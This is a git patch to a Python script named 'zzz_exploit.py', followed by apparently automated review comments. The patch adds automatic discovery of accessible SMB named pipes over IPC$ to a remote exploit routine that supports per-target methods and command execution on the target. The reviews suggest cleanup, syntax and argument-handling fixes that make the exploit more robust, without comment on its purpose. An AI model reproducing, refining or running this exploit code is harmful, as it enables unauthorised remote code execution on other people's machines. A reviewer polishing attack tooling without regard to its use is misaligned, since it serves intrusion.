From 6f47613603d67a28598b866f618c01bbb791dfbb Mon Sep 17 00:00:00 2001
From: worawit
Date: Sun, 16 Jul 2017 22:50:44 +0700
Subject: [PATCH] find named pipe if it is omitted

---
 zzz_exploit.py | 29 ++++++++++++++++++++++++++---
 1 file changed, 26 insertions(+), 3 deletions(-)

diff --git a/zzz_exploit.py b/zzz_exploit.py
index 2dcfb52..37e9bab 100644
--- a/zzz_exploit.py
+++ b/zzz_exploit.py
@@ -269,6 +269,22 @@ def wait_for_request_processed(conn):
 # send echo is faster than sleep(0.05) when connection is very good
 conn.send_echo('a')
+def find_named_pipe(conn):
+ pipes = [ 'browser', 'spoolss', 'netlogon', 'lsarpc', 'samr' ]
+
+ tid = conn.tree_connect_andx('\\\\'+conn.get_remote_host()+'\\'+'IPC$')
+ found_pipe = None
+ for pipe in pipes:
+ try:
+ fid = conn.nt_create_andx(tid, pipe)
+ conn.close(tid, fid)
+ found_pipe = pipe
+ except smb.SessionError, e:
+ pass
+
+ conn.disconnect_tree(tid)
+ return found_pipe
+
 special_mid = 0
 extra_last_mid = 0
@@ -768,6 +784,13 @@ def exploit(target, pipe_name):
 else:
 print('This exploit does not support this target')
 sys.exit()
+
+ if pipe_name is None:
+ pipe_name = find_named_pipe(conn)
+ if pipe_name is None:
+ print('Not found accessible named pipe')
+ return False
+ print('Using named pipe: '+pipe_name)
 if not info['method'](conn, pipe_name, info):
 return False
@@ -921,12 +944,12 @@ def service_exec(conn, cmd):
 rpcsvc.disconnect()
-if len(sys.argv) != 3:
- print("{} ".format(sys.argv[0]))
+if len(sys.argv) < 2:
+ print("{} [pipe_name]".format(sys.argv[0]))
 sys.exit(1)
 target = sys.argv[1]
-pipe_name = sys.argv[2]
+pipe_name = None if len(sys.argv) < 3 else sys.argv[2]
 exploit(target, pipe_name)
 print('Done')
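Review bot: In `find_named_pipe`, `conn.disconnect_tree(tid)` is reached only on the normal path; if `nt_create_andx` or `conn.close` raises anything other than `smb.SessionError`, the IPC$ tree is left connected while the exception propagates, so the probe loop should sit inside `try:` with `finally: conn.disconnect_tree(tid)`. The `except smb.SessionError, e:` clause binds `e` without using it and is Python 2-only syntax; `except smb.SessionError:` behaves the same and parses under both interpreter versions. The loop also does not stop at the first success, so the function returns the last accessible entry of `pipes` rather than the first; either add `break` after `found_pipe = pipe` if the list order is a preference, or state the actual behaviour in a docstring. A one-line docstring such as `"""Return an entry of pipes that can be opened on IPC$, or None if none is accessible."""` would also help, since the function has no documentation at all.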
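Review bot: The new early `return False` after `print('Not found accessible named pipe')` leaves `conn` as it is, while the neighbouring unsupported-target branch ends the process with `sys.exit()`; whether `exploit` closes the connection on its other `return False` paths is not visible here, because the function starts and ends outside the hunk, so this return should be made consistent with whatever those paths do. The message reads more naturally as `print('No accessible named pipe found')`. A comment above `if pipe_name is None:` such as `# pipe_name was omitted on the command line: look one up over IPC$` would explain why the lookup is conditional.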
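Review bot: The usage string `"{} [pipe_name]".format(sys.argv[0])` prints only the script name and the optional argument, so the required target is never shown in the usage line; the removed line has the same gap (`"{} "`), which suggests an angle-bracketed target placeholder was lost when the patch was rendered, so confirm the literal in the file before merging. The check `len(sys.argv) < 2` also accepts any number of extra arguments silently; `if not 2 <= len(sys.argv) <= 3:` matches the two accepted shapes exactly. For readability, `pipe_name = sys.argv[2] if len(sys.argv) > 2 else None` puts the common case first.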